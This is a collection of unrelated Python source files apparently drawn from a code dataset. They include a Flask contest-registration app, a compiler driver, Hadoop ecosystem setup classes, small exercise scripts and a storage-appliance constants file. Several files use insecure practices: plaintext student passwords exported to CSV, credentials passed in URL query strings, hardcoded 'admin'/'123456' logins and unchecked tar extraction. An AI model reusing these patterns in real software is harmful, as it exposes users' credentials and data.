message=\"Division must be chosen from the drop down menu\", **params)\n if not (params['email'] and re.match(r\"^[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}$\", params['email'], re.IGNORECASE)):\n return render_template('editstudent.html', message='Please enter a valid email address', **params)\n if int(params['year']) >= 11 and params['division']!='S':\n return render_template('editstudent.html', message='Students in year 11 and 12 can only compete in the senior division', **params)\n student.firstname = request.form['firstname']\n student.lastname = request.form['lastname']\n student.year = request.form['year']\n student.gender = request.form['gender']\n student.email = request.form['email']\n student.division = request.form['division']\n db.session.add(student)\n db.session.commit()\n return redirect(url_for('register'))\n\n params = {}\n params[\"firstname\"] = student.firstname\n params[\"lastname\"] = student.lastname\n params[\"year\"] = student.year\n params[\"gender\"] = student.gender\n params[\"email\"] = student.email\n params[\"division\"] = student.division\n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template('editstudent.html', **params)\n\n @self.route('/register/student/add/', methods=['GET', 'POST'])\n def addstudent():\n if not current_user.is_authenticated():\n return notauthenticated()\n\n if request.method == 'POST':\n params = {\"addingpage\":True}\n params['firstname'] = request.form.get('firstname', '').strip()\n params['lastname'] = request.form.get('lastname', '').strip()\n params['year'] = request.form.get('year', '') \n params['gender'] = request.form.get('gender', '') \n params['email'] = request.form.get('email', '').strip()\n params['division'] = request.form.get('division', '')\n if not (params['firstname']):\n return render_template('editstudent.html', message=\"First name must be defined\", **params)\n if not (params['lastname']):\n return render_template('editstudent.html', message=\"Last name must be defined\", **params)\n if not (params['year'] and params['year'].isdigit and int(params['year']) >= 1 and int(params['year']) <= 12):\n return render_template('editstudent.html', message=\"Year must be a number between 1 and 12\", **params)\n if not (params['gender'] and len(params['gender']) == 1 and params['gender'] in 'UFM'):\n return render_template('editstudent.html', message=\"Gender must be chosen from the drop down menu\", **params)\n if not (params['division'] and len(params['division']) == 1 and params['division'] in 'IS'):\n return render_template('editstudent.html', message=\"Division must be chosen from the drop down menu\", **params)\n if not (params['email'] and re.match(r\"^[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}$\", params['email'], re.IGNORECASE)):\n return render_template('editstudent.html', message='Please enter a valid email address', **params)\n if int(params['year']) >= 11 and params['division']!='S':\n return render_template('editstudent.html', message='Students in year 11 and 12 can only compete in the senior division', **params)\n uname = self.generate_username(request.form['firstname'], request.form['lastname'])\n student = Student(uname, self.generate_password(),\n current_user.school,\n request.form['firstname'],\n request.form['lastname'],\n request.form['year'],\n request.form['gender'],\n request.form['email'],\n request.form['division'])\n db.session.add(student)\n db.session.commit()\n placetogo = 'register' if request.form.get('another',None) is None else 'addstudent'\n return redirect(url_for(placetogo))\n\n params = {\"addingpage\":True}\n params[\"firstname\"] = \"\"\n params[\"lastname\"] = \"\"\n params[\"year\"] = \"\"\n params[\"gender\"] = \"\"\n params[\"email\"] = \"\"\n params[\"division\"] = \"\"\n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template('editstudent.html', **params)\n\n @self.route('/register/student//delete/')\n def deletestudent(studentid):\n # ensure that user is logged in\n if not current_user.is_authenticated():\n return \"not authenticated\"\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"not your student, or student doesn't exist\"\n return render_template('deletestudent.html', student=student)\n\n @self.route('/register/student//finaldelete/')\n def deletestudentfinal(studentid):\n # ensure that user is logged in\n if not current_user.is_authenticated():\n return \"not authenticated\"\n # ensure student exists and that user has permissions to view student\n student = Student.query.filter_by(id=studentid).first()\n if student is None or student.school_id != current_user.school.id:\n return \"not your student, or student doesn't exist\"\n db.session.add(Deleted(student.username))\n db.session.delete(student)\n db.session.commit()\n return redirect(url_for('register'))\n\n @self.route('/register/school/edit/', methods=['GET', 'POST'])\n def editschool():\n if not current_user.is_authenticated():\n return notauthenticated()\n cschool = current_user.school\n if request.method == 'POST':\n params = {\"countries\":self.countries}\n params['schoolname'] = request.form.get('schoolname', '') \n params['teachername'] = request.form.get('teachername', '').strip()\n params['email'] = request.form.get('email', '').strip()\n params['phone'] = request.form.get('phone', '') \n if not (params['schoolname']):\n return render_template('editschool.html', message=\"School name must be defined\", **params)\n if not (params['teachername']):\n return render_template('editschool.html', message=\"Teacher name must be defined\", **params)\n if not (params['phone']):\n return render_template('editschool.html', message=\"Phone number must be entered\", **params)\n if not (params['email'] and re.match(r\"[A-Z'0-9._%+-]+@[A-Z0-9.-]+\\.[A-Z]{2,4}\", params['email'], re.IGNORECASE)):\n return render_template('editschool.html', message='Please enter a valid email address', **params)\n cschool.school_name = request.form['schoolname']\n cschool.teacher_name = request.form['teachername']\n cschool.email = request.form['email']\n cschool.phone = request.form['phone']\n db.session.add(cschool)\n db.session.commit()\n return redirect(url_for('register'))\n\n params = {\"countries\":self.countries}\n params[\"schoolname\"] = cschool.school_name \n params[\"teachername\"] = cschool.teacher_name \n params[\"email\"] = cschool.email\n params[\"phone\"] = cschool.phone \n for i in params:\n if params[i] == None:\n params[i] = \"\"\n return render_template(\"editschool.html\", school=cschool, **params)\n\n def notauthenticated():\n return \"not authenticated\"\n \n @self.route('/register/school/students.csv')\n def downloadStudents():\n if not current_user.is_authenticated():\n return notauthenticated()\n cschool = current_user.school\n si = StringIO.StringIO()\n cw = csv.writer(si)\n cw.writerow((\"First Name\", \"Last Name\", \"Year\", \"Division\", \"Email\", \"Username\", \"Password\"))\n students = Student.query.filter_by(school_id=cschool.id).order_by(Student.division, Student.id)\n studentData = [(s.firstname, s.lastname, s.year, (\"Intermediate\" if s.division==\"I\" else \"Senior\"), s.email, s.username, s.password) for s in students]\n cw.writerows(studentData)\n output = make_response(si.getvalue())\n output.headers[\"Content-Disposition\"] = \"attachment; filename=AIOstudents.csv\"\n output.headers[\"Content-type\"] = \"text/csv\"\n return output\n\n @self.route('/contest/')\n def contestlisting():\n return render_template(\"contests.html\", contestlive=self.contest_links_live())\n @self.route('/docs/rules.pdf')\n def rulebookpdf():\n return self.pdfresponse('docs/rules.pdf', 'rules')\n\n @self.route('/docs/aio18-int.pdf')\n def aio15intpdf():\n if not current_user.is_authenticated():\n return notauthenticated()\n if not self.contest_links_live():\n return \"Page not found\", 404\n return self.pdfresponse('docs/aio18-int.pdf', 'aio18-int')\n\n @self.route('/docs/aio18-sen.pdf')\n def aio15senpdf():\n if not current_user.is_authenticated():\n return notauthenticated()\n if not self.contest_links_live():\n return \"Page not found\", 404\n return self.pdfresponse('docs/aio18-sen.pdf', 'aio18-sen')\n\n @self.route('/docs/feedback')\n def feedback():\n argusername=request.args.get('username', None)\n argpassword=request.args.get('password', None)\n if argusername is None or argpassword is None:\n return \"invalid username or password\", 403\n student = Student.query.filter_by(username=argusername, password=argpassword).first()\n if student is None:\n return \"invalid username or password\", 403\n zippath = 'docs/feedback/%s.zip' % argusername\n zipname = '%s.zip' % argusername\n data = self.open_resource(zippath).read()\n response = make_response(data)\n response.headers['Content-Type'] = 'application/zip'\n response.headers['Content-Disposition'] = \\\n 'inline; filename=%s' % zipname\n return response\n \n\n def pdfresponse(self, fpath, fname):\n with self.open_resource(fpath) as f:\n data = f.read()\n response = make_response(data)\n response.headers['Content-Type'] = 'application/pdf'\n response.headers['Content-Disposition'] = \\\n 'inline; filename=%s.pdf' % fname\n return response\n\n\n def contest_links_live(self):\n tnow = datetime.datetime.utcnow()\n tlive = datetime.datetime(2018,8,22,22,0)\n islive = tnow >= tlive\n return islive\n\n def generate_password(self):\n return random.choice(self.wordlist)+random.choice(self.wordlist) \n\n def generate_username(self, firstname, lastname):\n firstname = filter(lambda x: x >= 'a' and x <= 'z', firstname.lower())\n lastname = filter(lambda x: x >= 'a' and x <= 'z', lastname.lower())\n candidate = firstname[:6] + lastname[:3]\n appendage = '' if len(candidate) != 0 else '1'\n if self.username_exists(candidate+str(appendage)):\n appendage = 1\n while self.username_exists(candidate+str(appendage)):\n appendage += 1\n return candidate + str(appendage)\n\n def username_exists(self, uname):\n return (Student.query.filter_by(username=uname).first() is not None or\n Deleted.query.filter_by(username=uname).first() is not None)\n\n def init_db(self):\n db.init_app(self)\n db.app = self # slight hack to work around flask's context \"feature\"\n db.create_all()\n db.session.commit()\n","sub_path":"aioregister/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611715447","text":"#65. cosine series print and sumation of its:\n\n\ndef fact(n): # define the function of n used for factorial used .??\n fact = 1\n while n > 0:\n fact*=n\n n = n - 1\n return fact\nn=int(input(\"enter the number of term :\"))\nx=int(input(\"enter the value of x:\"))\nsum=1\nfor i in range (1,n+1):\n sum = sum + ((((-1)**i)) * (x**(2*i))) / fact(2*i) # cosine series formula in fact values.\nprint(sum)","sub_path":"PythonPrograms/python_program/cos_series_sumation.py","file_name":"cos_series_sumation.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635195599","text":"#!/usr/bin/env python3\n\n\"\"\"The main function of the compiler, AKA the compiler driver\"\"\"\n\nimport lexer\nimport parser\nfrom support import *\nfrom datalayout import *\nfrom cfg import *\nfrom regalloc import *\nfrom codegen import *\n\n\ndef compile_program(text):\n lex = lexer.Lexer(text)\n pars = parser.Parser(lex)\n res = pars.program()\n print('\\n', res, '\\n')\n\n return\n res.navigate(print_stat_list)\n\n node_list = get_node_list(res)\n for n in node_list:\n print(type(n), id(n), '->', type(n.parent), id(n.parent))\n print('\\nTotal nodes in IR:', len(node_list), '\\n')\n\n res.navigate(lowering)\n\n node_list = get_node_list(res)\n print('\\n', res, '\\n')\n for n in node_list:\n print(type(n), id(n))\n try:\n n.flatten()\n except Exception:\n pass\n # res.navigate(flattening)\n print('\\n', res, '\\n')\n\n print_dotty(res, \"log.dot\")\n\n print(\"\\n\\nDATALAYOUT\\n\\n\")\n perform_data_layout(res)\n print('\\n', res, '\\n')\n\n cfg = CFG(res)\n cfg.liveness()\n cfg.print_liveness()\n cfg.print_cfg_to_dot(\"cfg.dot\")\n\n print(\"\\n\\nREGALLOC\\n\\n\")\n ra = LinearScanRegisterAllocator(cfg, 11)\n reg_alloc = ra()\n print(reg_alloc)\n\n print(\"\\n\\nCODEGEN\\n\\n\")\n code = generate_code(res, reg_alloc)\n print(code)\n\n return code\n\n\ndef driver_main():\n from lexer import __test_program\n test_program=__test_program\n import sys\n print(sys.argv)\n if len(sys.argv) >= 2:\n with open(sys.argv[1], 'r') as inf :\n test_program = inf.read()\n code = compile_program(test_program)\n\n if len(sys.argv) > 2:\n with open(sys.argv[-1], 'w') as outf :\n outf.write(code)\n\n\nif __name__ == '__main__':\n driver_main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79533341","text":"from __future__ import annotations\nimport os\nfrom pathlib import Path\nimport shutil\nfrom urllib.request import urlretrieve\nimport tarfile\nfrom typing import Tuple\nfrom argparse import Namespace\nimport threading\nfrom abc import ABC\nimport re\nfrom constants import HasConstants\n\n\nclass HasComponentBaseDirectory:\n @property\n def component_base_dir(self) -> str:\n raise NotImplementedError(\"Base class not implement base_dir\")\n\n\nclass HasData:\n @property\n def data(self) -> dict:\n raise NotImplementedError(\"Base class not implement data\")\n\n\nclass FileDiscoverable:\n @staticmethod\n def discover(dir_path: str, regex_pattern: str) -> list[Path]:\n paths = []\n pattern = re.compile(regex_pattern)\n for file_or_dir in Path(dir_path).rglob(\"*\"):\n if file_or_dir.is_file() and pattern.match(str(file_or_dir.name)):\n paths.append(file_or_dir)\n return paths\n\n\nclass DestinationFigurable(HasConstants):\n def get_dest(self, src: str) -> Path:\n relative_path = src[len(self.BASE_PATH):]\n return Path(self.TARGET_BASE_PATH + relative_path)\n\n\nclass TemplateRequired(HasComponentBaseDirectory, FileDiscoverable, DestinationFigurable):\n\n @property\n def template_files(self) -> list[Path]:\n dir_to_traverse = os.path.join(self.BASE_PATH, Path(self.component_base_dir).name)\n pattern = \".*\\\\.{EXTENSION}$\".format(EXTENSION=self.TEMPLATE_EXTENSION)\n return self.discover(dir_to_traverse, pattern)\n\n def do_template(self, engine, data) -> None:\n for to_template in self.template_files:\n content = engine.render(to_template, data)\n dest = Path(os.path.splitext(self.get_dest(str(to_template)))[0])\n dest.parent.mkdir(parents=True, exist_ok=True)\n with open(str(dest), \"w\") as f:\n f.write(content)\n if str(dest.suffix) in [\".sh\", \".py\"]:\n os.chmod(dest, 0o755)\n\n\nclass FilesCopyRequired(ABC, HasComponentBaseDirectory, FileDiscoverable, DestinationFigurable):\n @property\n def files_to_copy(self) -> list[Path]:\n dir_to_traverse = os.path.join(self.BASE_PATH, Path(self.component_base_dir).name)\n pattern = \"(?!.*\\\\.{EXTENSION}$)\".format(EXTENSION=self.TEMPLATE_EXTENSION)\n return self.discover(dir_to_traverse, pattern)\n\n def copy(self) -> None:\n for to_copy in self.files_to_copy:\n dest = self.get_dest(str(to_copy))\n dest.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy2(to_copy, dest)\n if str(dest.suffix) in [\".sh\", \".py\"]:\n os.chmod(dest, 0o755)\n\n\nclass DownloadRequired(HasComponentBaseDirectory, HasConstants):\n def __init__(self, force_download: bool):\n self.force_download = force_download\n\n def download_async(self) -> list[threading.Thread]:\n Path(self.component_base_dir).mkdir(parents=True, exist_ok=True)\n links = self.links_to_download\n awaitables = []\n for i in range(0, len(links)):\n link, output_file = links[i]\n download_func = self._download\n if not self.force_download and Path(output_file).exists():\n download_func = self._dummy_download\n\n awaitables.append(threading.Thread(target=download_func,\n args=(link, output_file)))\n return awaitables\n\n @staticmethod\n def _dummy_download(url: str, output_file: Path) -> None:\n print(\"Download from {URL} is ignored as {PATH} already exists\".format(URL=url, PATH=str(output_file)))\n return\n\n @staticmethod\n def _download(url: str, output_file: Path) -> None:\n print(\"Downloading from {SOURCE} to {DESTINATION}\".format(SOURCE=url, DESTINATION=output_file))\n urlretrieve(url, filename=output_file)\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n raise NotImplementedError(\"Base class not implement links_to_download\")\n\n\nclass DecompressRequired:\n def decompress_async(self) -> list[threading.Thread]:\n awaitables = []\n for compressed, dest in self.files_to_decompress:\n decompress_func = self._decompress\n if dest.exists():\n decompress_func = self._dummy_decompress\n\n awaitables.append(threading.Thread(target=decompress_func, args=(compressed, dest)))\n return awaitables\n\n @staticmethod\n def _dummy_decompress(compressed: Path, dest_path: Path) -> None:\n print(\"Decompressing {COMPRESSED} is ignored as {PATH} already exists\".format(\n COMPRESSED=str(compressed), PATH=str(dest_path)))\n return\n\n @staticmethod\n def _decompress(compressed: Path, dest_path: Path) -> None:\n dest_path.mkdir(parents=True, exist_ok=True)\n with tarfile.open(Path(compressed)) as f:\n f.extractall(dest_path)\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n raise NotImplementedError(\"Base class not implement decompress\")\n\n\nclass Component(ABC):\n pass\n\n\nclass Scripts(Component, TemplateRequired):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"bin\")\n\n @property\n def data(self) -> dict:\n return {}\n\n\nclass ClusterStarter(Component, FilesCopyRequired, TemplateRequired, HasData, HasConstants):\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"cluster-starter\")\n\n @property\n def data(self) -> dict:\n return {\n \"additional\": {\n \"image\": {\n \"cluster-starter\": self.CLUSTER_STARTER_IMAGE_NAME\n }\n }\n }\n\n\nclass Hue(Component, FilesCopyRequired, TemplateRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hue\")\n\n @property\n def data(self) -> dict:\n return {\n \"hue\": {\n \"db-user\": \"hue\", \"db-password\": \"hue\", \"db-name\": \"hue\", \"db-host\": \"cluster-db\", \"db-port\": \"5432\"\n }\n }\n\n\nclass Hadoop(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData, HasConstants):\n TAR_FILE_NAME = \"hadoop.tar.gz\"\n PREDEF_GROUPS = {\n \"admin\": 150, \"hadoop\": 151, \"hadoopsvc\": 152, \"usersvc\": 154, \"dataplatform_user\": 155, \"hadoopUser\":156,\n \"bi_user_group\": 157, \"ml_user_group\": 158, \"de_user_group\": 159\n }\n\n PREDEF_USERS = {\n \"hdfs\": {\"uid\": 180, \"groups\": [\"admin\"], \"isSvc\": True, \"proxyGroup\": \"*\"},\n \"webhdfs\": {\"uid\": 181, \"groups\": [\"admin\"], \"isSvc\": True, \"proxyGroup\": \"*\"},\n \"hive\": {\"uid\": 182, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"hue\": {\"uid\": 183, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"spark\": {\"uid\": 184, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"bi_user\": {\"uid\": 185, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"bi_user_group\"], \"isSvc\": False},\n \"bi_svc\": {\"uid\": 186, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"bi_user_group\"},\n \"ml_user\": {\"uid\": 187, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"ml_user_group\"], \"isSvc\": False},\n \"ml_svc\": {\"uid\": 188, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"ml_user_group\"},\n \"de_user\": {\"uid\": 189, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"de_user_group\"], \"isSvc\": False},\n \"de_svc\": {\"uid\": 190, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"de_user_group\"}\n }\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_hadoop)\n self.hadoop_version = args.hadoop_version\n self.java_version = args.java_version\n self.num_datanode = args.num_datanode\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hadoop\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n (\"https://github.com/dev-moonduck/hadoop/releases/download/v{HADOOP_VERSION}/hadoop-{HADOOP_VERSION}.tar.gz\"\n .format(HADOOP_VERSION=self.hadoop_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"hadoop-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"primary_namenode\": {\n \"host\": \"primary-namenode\", \"rpc-port\": \"9000\", \"http-port\": \"9870\"\n },\n \"secondary_namenode\": {\n \"host\": \"secondary-namenode\", \"rpc-port\": \"9000\", \"http-port\": \"9870\"\n },\n \"journalnode\": {\"host\": [\"journalnode1\", \"journalnode2\", \"journalnode3\"], \"port\": \"8485\"},\n \"zookeeper\": {\"host\": [\"zookeeper1\", \"zookeeper2\", \"zookeeper3\"], \"port\": \"2181\"},\n \"yarn_history\": {\"host\": \"yarn-history\", \"port\": \"8188\"},\n \"resource_manager\": {\n \"host\": \"resource-manager\", \"port\": \"8032\", \"web-port\": \"8088\", \"resource-tracker-port\": \"8031\",\n \"scheduler-port\": \"8030\"\n },\n \"datanode\": {\n \"host\": list(map(lambda i: \"datanode\" + str(i), range(1, self.num_datanode + 1))),\n \"rpc-port\": \"9864\", \"nodemanager-port\": \"8042\"\n },\n \"additional\": {\n \"users\": self.PREDEF_USERS, \"groups\": self.PREDEF_GROUPS,\n \"dependency-versions\": {\n \"hadoop\": self.hadoop_version, \"java\": self.java_version\n },\n \"agent\": {\n \"port\": \"3333\"\n },\n \"image\": {\n \"hadoop\": self.HADOOP_IMAGE_NAME\n }\n }\n }\n\n\nclass Hive(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"hive.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_hive)\n self.hive_version = args.hive_version\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hive\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n ((\"https://github.com/dev-moonduck/hive/releases/download/v{HIVE_VERSION}\"\n + \"/apache-hive-{HIVE_VERSION}.tar.gz\").format(HIVE_VERSION=self.hive_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"hive-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"hive_server\": {\"host\": \"hive-server\", \"thrift-port\": \"10000\", \"http-port\": \"10001\"},\n \"hive_metastore\": {\"host\": \"hive-metastore\", \"thrift-port\": \"9083\", \"metastore-db-host\": \"cluster-db\",\n \"metastore-db-port\": \"5432\", \"metastore-db-name\": \"metastore\",\n \"metastore-db-user\": \"hive\", \"metastore-db-password\": \"hive\"},\n \"additional\": {\n \"dependency-versions\": {\n \"hive\": self.hive_version\n }\n }\n }\n\n\nclass Spark(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"spark.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_spark)\n self.spark_version = args.spark_version\n self.scala_version = args.scala_version\n self.hadoop_version = args.hadoop_version\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [(\n (\"https://github.com/dev-moonduck/spark/releases/download/v{SPARK_VERSION}-{SCALA_VERSION}-{HADOOP_VERSION}\"\n + \"/spark-{SPARK_VERSION}-{SCALA_VERSION}-{HADOOP_VERSION}.tar.gz\").format(\n SPARK_VERSION=self.spark_version, SCALA_VERSION=self.scala_version, HADOOP_VERSION=self.hadoop_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"spark-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {}\n\n\nclass SparkHistory(Component, TemplateRequired, FilesCopyRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark-history\")\n\n @property\n def data(self) -> dict:\n return {\n \"spark_history\": {\"host\": \"spark-history\", \"port\": \"18080\"}\n }\n\n\nclass SparkThrift(Component, TemplateRequired, FilesCopyRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark-thrift\")\n\n @property\n def data(self) -> dict:\n return {\n \"spark_thrift\": {\"host\": \"spark-thrift\", \"thrift-port\": \"10010\", \"http-port\": \"10011\"}\n }\n\n\nclass Presto(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"presto.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_presto)\n self.presto_version = args.presto_version\n self.num_worker = args.num_presto_worker\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"presto\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n ((\"https://github.com/dev-moonduck/presto/releases/download/v{PRESTO_VERSION}\"\n + \"/presto-server-{PRESTO_VERSION}.tar.gz\").format(PRESTO_VERSION=self.presto_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"presto-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"presto_server\": {\"host\": \"presto-server\", \"port\": \"8081\"}\n }\n\n\nclass ComponentFactory:\n @staticmethod\n def get_components(args: Namespace) -> list[Component]:\n components = [Scripts(), ClusterStarter(), Hadoop(args)]\n if args.hive or args.all:\n components.append(Hive(args))\n if args.spark_thrift or args.spark_history or args.all:\n components.append(Spark(args))\n if args.spark_history or args.all:\n components.append(SparkHistory())\n if args.spark_thrift or args.all:\n components.append(SparkThrift())\n if args.presto or args.all:\n components.append(Presto(args))\n if args.hue or args.all:\n components.append(Hue())\n return components\n","sub_path":"component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":15890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183753282","text":"#! /usr/bin/env python3\n\nimport sys\n\nresistor_colours = [\"black\" ,\"brown\", \"red\", \"orange\", \"yellow\", \"green\", \"blue\" ,\"violet\", \"grey\", \"gold\", \"silver\"]\n\nfirst_band = sys.argv[1]\nsecond_band = sys.argv[2]\nthird_band = sys.argv[3]\ntolerance = sys.argv[4]\nif len(sys.argv) == 1:\n for colour in range(0, 11):\n print(resistor_colours[colour])\nelif len(sys.argv) == 6:\n print (\"yo!\")\nelse:\n print(\"enter entire value\")\n","sub_path":"exercises/04-resistor-value-calculator.py","file_name":"04-resistor-value-calculator.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544148228","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2013 Mellanox Technologies, Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n# VSA Constants\n\nERR_TWISTED = 3\nERR_HA_SLAVE = 11\nERR_HA_TRANSITION = 12\nERR_COMPUTE_NODE = 13\nERR_LOADPVD = 15\nERR_LOADPVD_LO = 17\n\n# Data refresh period in seconds, 0 means no periodic refresh\nREFRESH_PERIOD = 60\n\n# Communication ports\nSANSRV_XMLRPC_PORT = 7080\nVSAD_XMLRPC_PORT = 7081\nMANHOLE_PORT = 7082\n\n# Timeout for vsad rpc connections\nVSAD_RPC_TIMEOUT = 30\n\nMANHOLE_CREDENTIALS = { 'admin': '123456' }\nWEBPORTAL_CREDENTIALS = { 'admin': '123456' }\n\nparamopts=['vendor_id','product_id','product_rev','scsi_id','scsi_sn','removable','mode_page','sense_format','online','path','direct']\niSCSIOpts=['MaxRecvDataSegmentLength','MaxXmitDataSegmentLength','DataDigest','HeaderDigest'\n,'InitialR2T','MaxOutstandingR2T','ImmediateData','FirstBurstLength','MaxBurstLength',\n'DataPDUInOrder','DataSequenceInOrder','ErrorRecoveryLevel','IFMarker','OFMarker','DefaultTime2Wait',\n'DefaultTime2Retain','OFMarkInt','IFMarkInt','MaxConnections','RDMAExtensions','TargetRecvDataSegmentLength'\n,'InitiatorRecvDataSegmentLength','MaxOutstandingUnexpectedPDUs']\n\nshowlist=['system','config','log','version','cache','fctree']\n\n# Enums\nfrom enum import Enum\nTransport = Enum('iser', 'iscsi')\nOsType = Enum('unknown', 'linux', 'windows', 'vmware', 'other')\nObjState = Enum('unknown', 'created', 'running', 'blocked', 'error', 'absent', 'down',\n 'offline', 'degraded', 'delete', 'slaved', 'other')\n\ndef IsRunning(obj):\n \"\"\"\n The description of IsRunning comes here.\n @param obj\n @return\n \"\"\"\n return (obj.state==ObjState.running or obj.state==ObjState.degraded)\n\nReqState=Enum('enabled','disabled','error')\nClusterState=Enum('master','standby','slave','none','disabled','local','transition','standalone','compute')\nRaidLevel=Enum('none','0','1','5','6','10','dr','linear')\nCachePolicy=Enum('fifo','lru')\nIoSchedType=Enum('default','noop','cfq','deadline','anticipatory')\nQualityType=Enum('unknown','slow','average','fast','fastest')\nAlarmType=Enum('add', 'delete', 'state_change', 'error')\n\n\n# Flash Cache\nCACHEVGN = 'cache.vg' # name of the cache volume group\nCACHESEP = '._.' # replace the ':' char\nCACHEPFX = 'vcache.' # VSA flashcache prefix\nCACHECMDS = 'zero_stats','do_sync','stop_sync','reclaim_policy','write_merge','dirty_thresh_pct','fast_remove','fallow_delay'\n\n# constants for disk stats\nRDIO=0\nRDSEC=1\nRDWAIT=2\nRDMRG=3\nWRIO=4\nWRSEC=5\nWRWAIT=6\nWRMRG=7\n\n# log menu options\nlogopt=['agent','audit','event','tgt','webportal']\n\n# error return codes\nILLEGAL_EXT_NAME = 2\nEXT_IS_LOCKED = 3\nEXT_NOT_FOUND = 4\nEXT_NOT_RUNNING = 5\nEXT_IS_PRIVATE = 6\nEXT_NOT_ENABLED = 7\n\n# SNMP\nSNMP_TRAP_PORT = 162\nSNMP_TRAP_COMMUNITY = 